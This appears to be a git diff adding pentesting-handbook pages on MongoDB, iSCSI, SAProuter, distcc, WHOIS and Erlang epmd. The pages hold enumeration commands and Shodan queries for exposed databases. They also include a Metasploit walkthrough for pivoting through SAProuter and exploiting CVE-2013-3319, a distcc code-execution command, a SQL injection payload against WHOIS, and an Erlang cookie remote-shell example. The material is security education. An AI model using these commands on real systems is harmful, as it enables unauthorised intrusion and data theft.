+The first field of the fixed header represents the type of the MQTT Packet. All packet types are listed in table 01.![](https://miro.medium.com/max/60/1*z0fhdUVzGa0PLikH_cyBmQ.png?q=20)![](https://miro.medium.com/max/1469/1*z0fhdUVzGa0PLikH_cyBmQ.png)Table 01: MQTT Packet Types
+
diff --git a/pentesting/27017-27018-mongodb.md b/pentesting/27017-27018-mongodb.md
new file mode 100644
index 00000000..0a9c63f1
--- /dev/null
+++ b/pentesting/27017-27018-mongodb.md
@@ -0,0 +1,87 @@
+# 27017,27018 - Pentesting MongoDB
+
+## Basic Information
+
+MongoDB is an [open source](https://whatis.techtarget.com/definition/open-source) database management system \(DBMS\) that uses a document-oriented database model which supports various forms of data. \(From [here](https://searchdatamanagement.techtarget.com/definition/MongoDB)\)
+
+**Default port:** 27017, 27018
+
+```text
+PORT      STATE SERVICE VERSION
+27017/tcp open  mongodb MongoDB 2.6.9 2.6.9
+```
+
+## Enumeration
+
+### Manual
+
+```python
+from pymongo import MongoClient
+client = MongoClient(host, port, username=username, password=password)
+client.server_info() #Basic info
+#If you have admin access you can obtain more info
+admin = client.admin
+admin_info = admin.command("serverStatus")
+cursor = client.list_databases()
+for db in cursor:
+    print(db)
+    print(client[db["name"]].list_collection_names())
+#If admin access, you could dump the database also
+```
+
+**Some MongoDB commnads:**
+
+```bash
+show dbs
+use <db>
+show collections
+db.<collection>.find()  #Dump the collection
+db.<collection>.count() #Number of records of the collection
+db.current.find({"username":"admin"})  #Find in current db the username admin
+```
+
+### Automatic
+
+```bash
+nmap -sV --script "mongo* and default" -p 27017 <IP> #By default all the nmap mongo enumerate scripts are used
+```
+
+### Shodan
+
+* All mongodb: `"mongodb server information"`
+* Search for full open mongodb servers: `"mongodb server information" -"partially enabled"`
+* Only partially enable auth: `"mongodb server information" "partially enabled"`
+
+## Login
+
+By default mongo does not require password.  
+**Admin** is a common mongo database.
+
+```bash
+mongo <HOST>
+mongo <HOST>:<PORT>
+mongo <HOST>:<PORT>/<DB>
+mongo <database> -u <username> -p '<password>'
+```
+
+The nmap script: _**mongodb-brute**_ will check if creds are needed.
+
+```bash
+nmap -n -sV --script mongodb-brute -p 27017 <ip>
+```
+
+### [**Brute force**](../brute-force.md#mongo)\*\*\*\*
+
+Look inside _/opt/bitnami/mongodb/mongodb.conf_ to know if credentials are needed:
+
+```bash
+grep "noauth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#" #Not needed
+grep "auth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#\|noauth" #Not needed
+```
+
+## Post
+
+If you are root you can **modify** the **mongodb.conf** file so no credentials are needed \(_noauth = true_\) and **login without credentials**.
+
+
+
diff --git a/pentesting/3260-pentesting-iscsi.md b/pentesting/3260-pentesting-iscsi.md
new file mode 100644
index 00000000..f9077a55
--- /dev/null
+++ b/pentesting/3260-pentesting-iscsi.md
@@ -0,0 +1,148 @@
+# 3260 - Pentesting ISCSI
+
+## Basic Information
+
+> In computing, **iSCSI** is an acronym for **Internet Small Computer Systems Interface**, an Internet Protocol \(IP\)-based storage networking standard for linking data storage facilities. It provides block-level access to storage devices by carrying SCSI commands over a TCP/IP network. iSCSI is used to facilitate data transfers over intranets and to manage storage over long distances. It can be used to transmit data over local area networks \(LANs\), wide area networks \(WANs\), or the Internet and can enable location-independent data storage and retrieval.
+>
+> The protocol allows clients \(called initiators\) to send SCSI commands \(CDBs\) to storage devices \(targets\) on remote servers. It is a storage area network \(SAN\) protocol, allowing organizations to consolidate storage into storage arrays while providing clients \(such as database and web servers\) with the illusion of locally attached SCSI disks. It mainly competes with Fibre Channel, but unlike traditional Fibre Channel which usually requires dedicated cabling, iSCSI can be run over long distances using existing network infrastructure.
+
+**Default port:** 3260
+
+```text
+PORT     STATE SERVICE VERSION
+3260/tcp open  iscsi?
+```
+
+## Enumeration
+
+```
+nmap -sV --script=iscsi-info -p 3260 192.168.xx.xx
+```
+
+This script will indicate if authentication is required.
+
+### [Brute force](../brute-force.md#iscsi)
+
+### [Mount ISCSI on Linux](https://www.synology.com/en-us/knowledgebase/DSM/tutorial/Virtualization/How_to_set_up_and_use_iSCSI_target_on_Linux)
+
+### [Mount ISCSI on Windows](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee338476%28v=ws.10%29?redirectedfrom=MSDN)
+
+## **Manual enumeration**
+
+```bash
+sudo apt-get install open-iscsi
+```
+
+First of all you need to **discover the targets** name behind the IP:
+
+```
+iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260
+123.123.123.123:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe
+[2a01:211:7b7:1223:211:32ff:fea9:fab9]:3260,1 iqn.2000-01.com.synology:asd3.Target-1.d0280fd382
+[fe80::211:3232:fab9:1223]:3260,1 iqn.2000-01.com.synology:Oassdx.Target-1.d0280fd382
+```
+
+_Note that it will show the I**P and port of the interfaces** where you can **reach** those **targets**. It can even **show internal IPs or different IPs** from the one you used._
+
+Then you **catch the 2nd part of the printed string of each line** \(_iqn.1992-05.com.emc:fl1001433000190000-3-vnxe_ from the first line\) and **try to login**:
+
+```bash
+iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 --login
+Logging in to [iface: default, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] (multiple)
+Login to [iface: default, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] successful.
+```
+
+Then, you can **logout** using `–logout`
+
+```bash
+iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 --logout
+Logging out of session [sid: 6, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260]
+Logout of [sid: 6, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] successful.
+```
+
+We can find **more information** about it by just using **without** any `--login`/`--logout` parameter
+
+```bash
+iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260
+# BEGIN RECORD 2.0-873
+node.name = iqn.1992-05.com.emc:fl1001433000190000-3-vnxe
+node.tpgt = 1
+node.startup = manual
+node.leading_login = No
+iface.hwaddress = <empty>
+iface.ipaddress = <empty>
+iface.iscsi_ifacename = default
+iface.net_ifacename = <empty>
+iface.transport_name = tcp
+iface.initiatorname = <empty>
+iface.bootproto = <empty>
+iface.subnet_mask = <empty>
+iface.gateway = <empty>
+iface.ipv6_autocfg = <empty>
+iface.linklocal_autocfg = <empty>
+iface.router_autocfg = <empty>
+iface.ipv6_linklocal = <empty>
+iface.ipv6_router = <empty>
+iface.state = <empty>
+iface.vlan_id = 0
+iface.vlan_priority = 0
+iface.vlan_state = <empty>
+iface.iface_num = 0
+iface.mtu = 0
+iface.port = 0
+node.discovery_address = 192.168.xx.xx
+node.discovery_port = 3260
+node.discovery_type = send_targets
+node.session.initial_cmdsn = 0
+node.session.initial_login_retry_max = 8
+node.session.xmit_thread_priority = -20
+node.session.cmds_max = 128
+node.session.queue_depth = 32
+node.session.nr_sessions = 1
+node.session.auth.authmethod = None
+node.session.auth.username = <empty>
+node.session.auth.password = <empty>
+node.session.auth.username_in = <empty>
+node.session.auth.password_in = <empty>
+node.session.timeo.replacement_timeout = 120
+node.session.err_timeo.abort_timeout = 15
+node.session.err_timeo.lu_reset_timeout = 30
+node.session.err_timeo.tgt_reset_timeout = 30
+node.session.err_timeo.host_reset_timeout = 60
+node.session.iscsi.FastAbort = Yes
+node.session.iscsi.InitialR2T = No
+node.session.iscsi.ImmediateData = Yes
+node.session.iscsi.FirstBurstLength = 262144
+node.session.iscsi.MaxBurstLength = 16776192
+node.session.iscsi.DefaultTime2Retain = 0
+node.session.iscsi.DefaultTime2Wait = 2
+node.session.iscsi.MaxConnections = 1
+node.session.iscsi.MaxOutstandingR2T = 1
+node.session.iscsi.ERL = 0
+node.conn[0].address = 192.168.xx.xx
+node.conn[0].port = 3260
+node.conn[0].startup = manual
+node.conn[0].tcp.window_size = 524288
+node.conn[0].tcp.type_of_service = 0
+node.conn[0].timeo.logout_timeout = 15
+node.conn[0].timeo.login_timeout = 15
+node.conn[0].timeo.auth_timeout = 45
+node.conn[0].timeo.noop_out_interval = 5
+node.conn[0].timeo.noop_out_timeout = 5
+node.conn[0].iscsi.MaxXmitDataSegmentLength = 0
+node.conn[0].iscsi.MaxRecvDataSegmentLength = 262144
+node.conn[0].iscsi.HeaderDigest = None
+node.conn[0].iscsi.DataDigest = None
+node.conn[0].iscsi.IFMarker = No
+node.conn[0].iscsi.OFMarker = No
+# END RECORD
+```
+
+**There is a script to automate login/logout process available at** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability_Analysis/isciadm)\*\*\*\*
+
+## **References**
+
+{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %}
+
+
+
diff --git a/pentesting/3299-pentesting-saprouter.md b/pentesting/3299-pentesting-saprouter.md
new file mode 100644
index 00000000..83019668
--- /dev/null
+++ b/pentesting/3299-pentesting-saprouter.md
@@ -0,0 +1,319 @@
+# 3299 - Pentesting SAPRouter
+
+Copy of: [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)
+
+## Piercing SAProuter with Metasploit
+
+Saprouter is basically a reverse proxy for SAP systems, typically sitting between the Internet and internal SAP systems. Its main purpose is to allow controlled access from hosts on the Internet to the internal SAP systems, since it allows for a finer grained control of SAP protocols than a typical firewall.
+
+This means that saprouter usualy ends up being exposed to the Internet, by allowing the inbound TCP port 3299 to the saprouter host on the organization's firewalls. And from the saprouter, at least it should be possible to reach an internal SAP server. This makes it a very interesting target, since it can provide a way into the “high value” network.
+
+The following figure shows a basic network setup, which we will use for the examples:
+
+![](https://blog.rapid7.com/content/images/post-images/33923/image1.jpg)
+
+First we'll start by performing a SAP service scan of the exposed IP address, using the [`sap_service_discovery`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_service_discovery) module, in this case, 1.2.3.101.
+
+```text
+msf> use auxiliary/scanner/sap/sap_service_discovery
+msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
+RHOSTS => 1.2.3.101
+msf auxiliary(sap_service_discovery) > run
+
+[*] [SAP] Beginning service Discovery '1.2.3.101'
+
+[+] 1.2.3.101:3299      - SAP Router OPEN
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+The scan shows us that the host is running a SAP router on the expected port TCP 3299. We can now dig deeper, and attempt to obtain some information from the saprouter. If it has been misconfigured, and often they are, it may be possible to obtain internal information, such as connections established through the saprouter to internal hosts. For this purpose we use the [`sap_router_info_request`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_info_request) module:
+
+```text
+msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request 
+msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
+RHOSTS => 1.2.3.101
+msf auxiliary(sap_router_info_request) > run
+
+[+] 1.2.3.101:3299 - Connected to saprouter
+[+] 1.2.3.101:3299 - Sending ROUTER_ADM packet info request
+[+] 1.2.3.101:3299 - Got INFO response
+[+] Working directory   : /opt/sap
+[+] Routtab             : ./saprouttab
+
+[SAP] SAProuter Connection Table for 1.2.3.101
+===================================================
+
+   Source        Destination   Service
+   ------        -----------   -------
+   1.2.3.12      192.168.1.18  3200
+
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+So, from the output we see that someone on the Internet \(1.2.3.12\) is connected to an internal host \(192.168.1.18\) on port 3200. Port 3200 is a common SAP port for the DIAG protocol \(that's where the SAP GUI application connects to SAP servers\). We also obtain information about the internal IP addressing scheme, they're quite surely using at least the 192.168.1.0/24 network, or some subnet in that network.
+
+**Enumerating internal hosts and services**
+
+With this information, we are now able to start scanning the internal network. Since saprouter works like a proxy, we will attempt to connect to it and request connections to internal hosts and ports, and see the replies from saprouter. This may gives more insight into the internal hosts, services and ACLs, depending on the configuration of the saprouter. We'll be using the [`sap_router_portscanner`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_portscanner) module for this purpose.
+
+The module connects to the saprouter and  requests connections to other hosts \(defined in the TARGETS option\) in specific TCP ports. It then analyses the replies, and understands whether the requested connection is possible or not. This module provides a few options that can used:
+
+```text
+Basic options:
+  Name         Current Setting  Required  Description
+  ----         ---------------  --------  -----------
+  CONCURRENCY  10               yes       The number of concurrent ports to check per host
+  INSTANCES    00-99            no        SAP instance numbers to scan (NN in PORTS definition)
+  MODE         SAP_PROTO        yes       Connection Mode: SAP_PROTO or TCP  (accepted: SAP_PROTO, TCP)
+  PORTS        32NN             yes       Ports to scan (e.g. 3200-3299,5NN13)
+  RESOLVE      local            yes       Where to resolve TARGETS (accepted: remote, local)
+  RHOST                         yes       SAPRouter address
+  RPORT        3299             yes       SAPRouter TCP port
+  TARGETS                       yes       Comma delimited targets. When resolution is local address ranges or CIDR identifiers allowed.
+```
+
+At the very least you'll have to set the saprouter's IP address, in the example case, 1.2.3.101. Then, set TARGETS to the internal network addresses you'd like to scan, and finally set PORTS with the TCP ports to scan.
+
+The module provides also an INSTANCES option that allows simplifying the definition of the PORTS option. SAP installations support multiple instances, providing similar services, so each instance has assigned TCP ports. For example, SAP instance 00 will have the SAP dispatcher service \(where SAP GUI connects to\) on port 3200 and instance 01 on port 3201. The PORTS option supports a “wildcard” which is “NN” that will be replaced with the instance number, hence scanning ports for all the defined instances. So, if we want to scan instances from 00 to 50, we can define the INSTANCES and PORTS variables this way:
+
+```text
+msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
+INSTANCES => 00-01
+msf auxiliary(sap_router_portscanner) > set PORTS 32NN
+PORTS => 32NN
+```
+
+With this setting the module will scan ports in range 3200 to 3250.
+
+In the source of the module you have information regarding the common default ports on SAP systems, which we will now be using for scanning:
+
+```text
+msf > use auxiliary/scanner/sap/sap_router_portscanner 
+msf auxiliary(sap_router_portscanner) > use auxiliary/scanner/sap/sap_router_portscanner  
+msf auxiliary(sap_router_portscanner) > set RHOST 1.2.3.101
+RHOST => 1.2.3.101
+msf auxiliary(sap_router_portscanner) > set TARGETS 192.168.1.18
+TARGETS => 192.168.1.18
+msf auxiliary(sap_router_portscanner) > set INSTANCES 00-01
+INSTANCES => 00-01
+msf auxiliary(sap_router_portscanner) > set PORTS 32NN,33NN,48NN,80NN,36NN,81NN,5NN00-5NN19,21212,21213,59975,59976,4238-4241,3299,3298,515,7200,7210,7269,7270,7575,39NN,3909,4NN00,8200,8210,8220,8230,4363,4444,4445,9999,3NN01-3NN08,3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
+PORTS => 32NN,33NN,48NN,80NN,36NN,81NN,5NN00-5NN19,21212,21213,59975,59976,4238-4241,3299,3298,515,7200,7210,7269,7270,7575,39NN,3909,4NN00,8200,8210,8220,8230,4363,4444,4445,9999,3NN01-3NN08,3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
+msf auxiliary(sap_router_portscanner) > run
+
+[*] Scanning 192.168.1.18
+[!] Warning: Service info could be inaccurate
+
+Portscan Results
+================
+
+   Host           Port   State   Info
+   ----           ----   -----   ----
+   192.168.1.18   3201   closed  SAP Dispatcher sapdp01
+   192.168.1.18   3200   open    SAP Dispatcher sapdp00
+   192.168.1.18   50013  open    SAP StartService [SOAP] sapctrl00
+
+[*] Auxiliary module execution completed
+```
+
+We can try to understand why some connections are not allowed through the saprouter by using the VERBOSE option. When VERBOSE is set to true we are able to see the response from the saprouter, and map the defined ACL.
+
+We will now scan the 192.168.1.18 and the 192.168.1.1 hosts, but only on port 3200, to see if we can connect to both SAP dispatchers:
+
+```text
+msf auxiliary(sap_router_portscanner) > set VERBOSE true
+VERBOSE => true
+msf auxiliary(sap_router_portscanner) > set TARGETS 192.168.1.1,192.168.1.18
+TARGETS => 192.168.1.1,192.168.1.18
+msf auxiliary(sap_router_portscanner) > set PORTS 32NN
+PORTS => 32NN
+msf auxiliary(sap_router_portscanner) > run
+
+[*] Scanning 192.168.1.18
+[+] 192.168.1.18:3200 - TCP OPEN
+[!] Warning: Service info could be inaccurate
+
+Portscan Results
+================
+
+   Host          Port  State   Info
+   ----          ----  -----   ----
+   192.168.1.18  3200  open  SAP Dispatcher sapdp00
+
+[*] Scanning 192.168.1.1
+[-] 192.168.1.1:3200 - blocked by ACL
+[!] Warning: Service info could be inaccurate
+[*] Auxiliary module execution completed
+```
+
+As you can see, we now also know that we cannot connect to other host on port 3200, since it is blocked by the ACL defined on the saprouter.
+
+**Mapping the ACLs**
+
+An interesting thing about the saprouter, is that it supports two types of connections:
+
+* Native – These connections are simply TCP connections;
+* SAP protocol – These are TCP connections with a twist, the protocol states that all messages are started with 4 bytes stating the length of the following content.
+
+The SAP protocol is specific to saprouter, and is what the SAP GUI uses to connect to the SAP DIAG port through the saprouter. The native protocol is used for allowing other types of connections to pass through saprouter.
+
+This module allows for specifying which type of connection to test during the scan in the MODE option. The default is the SAP protocol, which is the most probable to be used in production. However, it is not uncommon to find other services allowed through the saprouter, where the ACL will allow native \(TCP\) connections through.
+
+We can set the MODE to TCP in order to assess whether this type of connections are allowed. We will now scan the internal hosts, both on port 3200 \(SAP DIAG\) and 80 \(HTTP\), with VERBOSE set to true, on both instances 00 and 01 and see what happens:
+
+```text
+msf auxiliary(sap_router_portscanner) > set MODE TCP 
+MODE => TCP
+
+msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
+PORTS => 80,32NN
+msf auxiliary(sap_router_portscanner) > set INSTANCES 00-01
+INSTANCES => 00-01
+msf auxiliary(sap_router_portscanner) > run
+
+[*] Scanning 192.168.1.18
+[+] 192.168.1.18:80 - TCP OPEN
+[-] 192.168.1.18:3200 - blocked by ACL
+[+] 192.168.1.18:3201 - TCP OPEN
+[!] Warning: Service info could be inaccurate
+
+Portscan Results
+================
+
+   Host          Port  State  Info
+   ----          ----  -----  ----
+   192.168.1.18  80    open   
+   192.168.1.18  3201  open   SAP Dispatcher sapdp01
+
+[*] Scanning 192.168.1.1
+[-] 192.168.1.1:3200 - blocked by ACL
+[+] 192.168.1.1:3201 - TCP OPEN
+[+] 192.168.1.1:80 - TCP OPEN
+[!] Warning: Service info could be inaccurate
+
+Portscan Results
+================
+
+   Host         Port  State  Info
+   ----         ----  -----  ----
+   192.168.1.1  3201  open   SAP Dispatcher sapdp01
+   192.168.1.1  80    open   
+
+[*] Auxiliary module execution completed
+```
+
+From the output and the previous information we now know that the ACL is something like this:
+
+* Allow TCP connections from any host to 192.168.1.1 to port 80
+* Allow TCP connections from any host to 192.168.1.18 to port 80
+* Allow TCP connections from any host to 192.168.1.1 to port 3201
+* Allow TCP connections from any host to 192.168.1.18 to port 3201
+* Allow SAP connections from any host to 192.168.1.18 to port 3200
+
+**Blind enumeration of internal hosts**
+
+If you recall, we started by obtaining information from the saprouter which allowed us to know the IP address on an internal host, and we went on from there. But what if the saprouter doesn't provide us with that information?
+
+One option is to just start scanning private address spaces, and see what happens. The other is to blindly enumerate hosts by hostname.
+
+Saprouters are able to resolve hostnames we request it to connect to. Saprouter is also kind enough to let us know what are the errors when it fails to connect \(you can actually see the raw responses by uncommenting line 242 on the module source\).
+
+With this feature we are able to enumerate internal hosts by hostname, and try to go directly for the gold!
+
+For this, we need to set the RESOLVE option to “remote”. In this case, the module will request connection to the TARGETS defined, without resolving them locally, and we can try to guess the internal hosts, and eventually connect to them without ever knowing their IP addresses.
+
+Important things to remember when blindly enumerating hosts:
+
+* Set VERBOSE to true;
+* We'll get more information from saprouter if MODE is set to SAP\_PROTO;
+* It is enough to set only one port to scan, since we're only interested at this point in the information sent by the saprouter \(try 3200\);
+* Results will vary depending on the configured ACL. Unfortunately blocked connections won't give us much info.
+
+In this example we'll try the hostnames sap, sapsrv and sapsrv2.
+
+```text
+msf auxiliary(sap_router_portscanner) > set RESOLVE remote
+RESOLVE => remote
+msf auxiliary(sap_router_portscanner) > set MODE SAP_PROTO
+MODE => SAP_PROTO
+msf auxiliary(sap_router_portscanner) > set VERBOSE true
+VERBOSE => true
+msf auxiliary(sap_router_portscanner) > set TARGETS sap,sapsrv,sapsrv2
+TARGETS => sap,sapsrv,sapsrv2
+msf auxiliary(sap_router_portscanner) > set PORTS 3200
+PORTS => 3200
+msf auxiliary(sap_router_portscanner) > run
+
+[*] Scanning sap
+[-] sap:3200 - unknown host
+[!] Warning: Service info could be inaccurate
+[*] Scanning sapsrv
+[-] sapsrv:3200 - host unreachable
+[!] Warning: Service info could be inaccurate
+[*] Scanning sapsrv2
+[+] sapsrv2:3200 - TCP OPEN
+[!] Warning: Service info could be inaccurate
+
+Portscan Results
+================
+
+   Host     Port  State  Info
+   ----     ----  -----  ----
+   sapsrv2  3200  open   SAP Dispatcher sapdp00
+
+[*] Auxiliary module execution completed
+```
+
+From the output we see that the host “sap” does not exist, but that host sapsrv does, although it is unreachable, and sapsrv2 exists and we can connect to port 3200.
+
+This technique can also be used to try to find other hosts on the network, not SAP related, just try using common hostnames, like smtp, exchange, pdc, bdc, fileshare, intranet, or what other nice hostnames you might have on your bag of tricks
+
+**The last mile**
+
+Now that we have obtained all this information, we know the internal hosts available, what services are allowed, and what protocols we can use to pierce the saprouter, we can actually connect to internal servers, and proceed with our pentest.
+
+Metasploit provides us with an awesome way to saprouter as a proxy, using the Proxies option, thanks to Dave Hartley \([@nmonkee](http://twitter.com/nmonkee)\).
+
+So at this point, we want to start gathering information on the internal sap server we have discovered in host 192.168.1.18. As an example, we'll be using the module [`sap_hostctrl_getcomputersystem`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem) which exploits CVE-2013-3319 and give us details on the OS the server is running on by querying the SAP Host Control service on port 1128 via an unauthenticated SOAP request. We'll be pivoting through the saprouter, using the proxy support in metasploit:
+
+![](https://blog.rapid7.com/content/images/post-images/33923/image2.jpg)
+
+```text
+msf auxiliary(sap_router_portscanner) > use auxiliary/scanner/sap/sap_hostctrl_getcomputersystem 
+msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299
+Proxies => sapni:1.2.3.101:3299
+msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18
+RHOSTS => 192.168.1.18
+msf auxiliary(sap_hostctrl_getcomputersystem) > run
+
+[+] 192.168.1.18:1128 - Information retrieved successfully
+[*] 192.168.1.18:1128 - Response stored in /Users/msfusr/.msf4/loot/20140107180827_default_192.168.1.18_sap.getcomputers_386124.xml (XML) and /Users/msfusr/.msf4/loot/20140107180827_default_192.168.1.18_sap.getcomputers_186948.txt (TXT)
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+If all went well, you'll have a nice output of the module in the loot containing interesting internal information from the target SAP host \(such as internal usernames you can then try to brute force \).
+
+Pivoting can \(and should!\) be used to run other modules against internal hosts, not only SAP systems!
+
+**Conclusion**
+
+We've seen how it is possible to exploit weak saprouter configurations that can allow access to internal hosts all the way from the Internet, all this using only metasploit's support for pentesting SAP systems.
+
+I hope this article can help shed light on both the risks associated with saprouter deployments, as well as SAP security in general.
+
+**References**
+
+* [http://labs.mwrinfosecurity.com/blog/2012/09/13/sap-smashing-internet-windows/](http://labs.mwrinfosecurity.com/blog/2012/09/13/sap-smashing-internet-windows/)
+* \[[http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2](http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2) - Mariano Nun ez Di Croce - SAProuter .pdf\]\([http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2](http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2) - Mariano Nunez Di Croce - SAProuter .pdf\)
+* [http://scn.sap.com/docs/DOC-17124](http://scn.sap.com/docs/DOC-17124)
+* [http://help.sap.com/saphelp\_nw70/helpdata/EN/4f/992dfe446d11d189700000e8322d00/f rameset.htm](http://help.sap.com/saphelp_nw70/helpdata/EN/4f/992dfe446d11d189700000e8322d00/frameset.htm)
+* [http://help.sap.com/saphelp\_dimp50/helpdata/En/f8/bb960899d743378ccb8372215bb767 /content.htm](http://help.sap.com/saphelp_dimp50/helpdata/En/f8/bb960899d743378ccb8372215bb767/content.htm)
+* [http://labs.integrity.pt/advisories/cve-2013-3319/](http://labs.integrity.pt/advisories/cve-2013-3319/)
+* [SAP Service Discovery \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_service_discovery)
+* [SAPRouter Admin Request \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_info_request)
+* [CVE-2013-3319 SAP Host Agent Information Disclosure \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem)
+* [SAPRouter Port Scanner \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_portscanner)
+
diff --git a/pentesting/3632-pentesting-distcc.md b/pentesting/3632-pentesting-distcc.md
new file mode 100644
index 00000000..0e3f8aae
--- /dev/null
+++ b/pentesting/3632-pentesting-distcc.md
@@ -0,0 +1,29 @@
+# 3632 - Pentesting distcc
+
+## Basic Information
+
+Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed
+
+**Default port:** 3632
+
+```text
+PORT     STATE SERVICE
+3632/tcp open  distccd
+```
+
+## Exploitation
+
+Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code:
+
+```bash
+msf5 > use exploit/unix/misc/distcc_exec
+nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
+```
+
+## Resources
+
+* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec)
+* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
+
+Post created by **Álex B \(@r1p\)**
+
diff --git a/pentesting/43-pentesting-whois.md b/pentesting/43-pentesting-whois.md
new file mode 100644
index 00000000..602c8af6
--- /dev/null
+++ b/pentesting/43-pentesting-whois.md
@@ -0,0 +1,28 @@
+# 43 - Pentesting WHOIS
+
+## Basic Information
+
+ **WHOIS** \(pronounced as the phrase "who is"\) is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block or an autonomous system, but is also used for a wider range of other information. \(From [here](https://en.wikipedia.org/wiki/WHOIS)\)
+
+**Default port:** 43
+
+```text
+PORT   STATE  SERVICE
+43/tcp open   whois?
+```
+
+## Enumerate
+
+Get all the information that a whois service has about a domain:
+
+```bash
+whois -h <HOST> -p <PORT> "domain.tld"
+echo "domain.ltd" | nc -vn <HOST> <PORT>
+```
+
+Notice than sometimes when requesting for some information to a WHOIS service the database being used appears in the response:
+
+![](../.gitbook/assets/image%20%28269%29.png)
+
+Also, the WHOIS service always needs to use a **database** to store and extract the information. So, a possible **SQLInjection** could be present when **querying** the database from some information provided by the user. For example doing: `whois -h 10.10.10.155 -p 43 "a') or 1=1#"` you could be able to **extract all** the **information** saved in the database.
+
diff --git a/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md b/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
new file mode 100644
index 00000000..50eb38cf
--- /dev/null
+++ b/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
@@ -0,0 +1,76 @@
+# 4369 - Pentesting Erlang Port Mapper Daemon \(epmd\)
+
+## Basic Info
+
+The erlang port mapper daemon is used to coordinate distributed erlang instances. His job is to **keep track of which node name listens on which address**. Hence, epmd map symbolic node names to machine addresses.
+
+**Default port**: 4369
+
+```text
+PORT     STATE SERVICE VERSION
+4369/tcp open  epmd    Erlang Port Mapper Daemon
+```
+
+This is used by default on RabbitMQ installations.
+
+## Enumeration
+
+### Manual
+
+```bash
+echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
+
+#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
+dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
+apt-get install erlang
+erl #Once Erlang is installed this will promp an erlang terminal
+1> net_adm:names('<HOST>'). #This will return the listen addresses
+```
+
+### Automatic
+
+```bash
+nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>
+
+PORT     STATE SERVICE VERSION
+4369/tcp open  epmd    Erlang Port Mapper Daemon
+| epmd-info: 
+|   epmd_port: 4369
+|   nodes: 
+|     bigcouch: 11502
+|     freeswitch: 8031
+|     ecallmgr: 11501
+|     kazoo_apps: 11500
+|_    kazoo-rabbitmq: 25672
+```
+
+### Erlang Cookie RCE
+
+If you can **leak the Authentication cookie** you will be able to execute code on the host. Usually, this cookie is located in `~/.erlang.cookie` and is generated by erlang at the first start. If not modified or set manually it is a random string \[A:Z\] with a length of 20 characters.
+
+```bash
+greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
+Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
+
+Eshell V8.1 (abort with ^G)
+
+At last, we can start an erlang shell on the remote system.
+
+(test@target.fqdn)1>os:cmd("id").
+"uid=0(root) gid=0(root) groups=0(root)\n"
+```
+
